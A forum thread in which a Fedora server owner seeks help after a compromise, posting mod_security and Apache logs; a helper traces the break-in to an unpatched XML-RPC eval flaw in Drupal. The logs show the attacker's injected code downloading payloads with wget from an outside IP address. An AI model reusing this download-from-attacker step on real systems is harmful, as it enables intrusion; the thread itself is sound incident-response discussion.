Got Hacked... fedora is keep sending stuff out at port 6664

Capt_Caveman · 12-22-2005, 08:39 AM

Capt_Caveman, yes I'm totally agree with you. In fact I'm concerned..but rebuild the entire system is not an option right now.
Right now I haven't seen anything that says you need to. However if the cracker was able to get root access, then that is the only effective option.

I would like to know how they compromised my /tmp folder too.. but I've limited expertise.
There can several places on many Linux installs that are by default writable to the Apache user, /tmp being one of them. Depending on how your system was configured the server root can be as well. Again though, this is a symptom, files are often placed by crackers in /tmp because it's writeable to the apache user. The real question is how were they able to get access to the apache user and upload files onto the system. Locking down /tmp is a good start in hardening the system, but it doesn't address that issue. Also be carefull on how you go about it, as /tmp needs to be writeable to a wide number of system utils.

woranl · 12-24-2005, 01:52 AM

After googling the web. I've found something call modsecurity for apache.. it's a web application firewall..

I installed and configure it.. and it looks like the problem occured because I didn't update my Drupal..

Here is one of the entry in my logfile from modsecurity

Quote:

==09758743==============================
Request: www.mydomain.com ##.##.###.### - - [23/Dec/2005:22:56:56 --0500] "POST /xmlrpc.php HTTP/1.1" 412 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

" H@188cCoAGUAAD1eAxsAAAAJ "-"
Handler: php5-script
----------------------------------------
POST /xmlrpc.php HTTP/1.1
Host: ##.##.###.###
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 412. Pattern match "<(.|\\n)+>" at POST_PAYLOAD
mod_security-action: 412

269

HTTP/1.1 412 Precondition Failed
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
--09758743--

Is this HTML/Javascript injection attack? (whatever that is)

Also, after carefully looked at my apache error log, here the part where things went wrong

Quote:

[Tue Dec 20 08:48:43 2005] [error] [client 216.138.244.145] script not found or unable to stat: /var/www/cgi-bin/awstats
[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
[client 216.138.244.145] PHP Warning: Unterminated comment starting line 1 in /var/www/html/blog/includes/xmlrpcs.inc(249) : eval()'d code on line 1
--08:48:47-- http://209.136.48.69/mirela
=> `mirela'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 94 [text/plain]

0K 100% 3.90 MB/s

08:48:47 (3.90 MB/s) - `mirela' saved [94/94]

--08:48:47-- http://209.136.48.69/d
=> `d'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 469,240 (458K) [text/plain]

0K ...[Tue Dec 20 08:48:48 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blog/xmlsrv
....... ...[Tue Dec 20 08:48:49 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blogs
....... ..[Tue Dec 20 08:48:50 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/drupal
.......[Tue Dec 20 08:48:52 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/phpgroupware
. ......[Tue Dec 20 08:48:53 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/wordpress
..[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
.. .......... 10% 6.81 KB/s
50K ...[Tue Dec 20 08:48:55 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlrpc
.......[Tue Dec 20 08:48:56 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlsrv
.......... .......... .......... .......... 21% 6.95 KB/s
100K .......... .......... .......... .......... .......... 32% 6.94 KB/s
150K .......... .......... .......... .......... .......... 43% 7.11 KB/s
200K .......... .......... .......... .......... .......... 54% 7.17 KB/s
250K .......... .......... .......... .......... .......... 65% 7.60 KB/s
300K .......... .......... .......... .......... .......... 76% 8.67 KB/s
350K .......... .......... .......... .......... .......... 87% 14.05 KB/s
400K .......... .......... .......... .......... .......... 98% 13.90 KB/s
450K ........ 100% 19.13 KB/s

08:49:43 (8.23 KB/s) - `d' saved [469240/469240]

--08:49:43-- http://209.136.48.69/w
=> `w'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,913 (34K) [text/plain]

0K .......... .......... .......... .... 100% 16.89 KB/s

08:49:45 (16.89 KB/s) - `w' saved [34913/34913]

Now I've modsecurity installed.
Block the attacker ip (although they can always use other IP to attack me again).
hm.. whatelse should I do next?

btw, thanks for all your reply

Capt_Caveman · 12-26-2005, 05:13 PM

Looks like your system is vulnerable to the XML-RPC vulnerability. This is a fairly old bug and Fedora has issued a fix for it. Have you kept your system updated with security fixes/patches? If not, then that is definitely a problem that you need to address immediately.

woranl · 12-26-2005, 05:18 PM

when I type yum update in terminal, it said my system is up to date
am I missing something?

Capt_Caveman · 12-26-2005, 05:31 PM

Have you updated since the attack appeared in your logs (Dec 20)?

Also, a little OT, but I would highly recommend running some form of antivirus on the system as well. Cracking binaries are notorious for being infected with linux viruses plus the scan itself resembles that of the lupper/luppi worm and one the the uploaded binaries is approximately the same size (34Mb).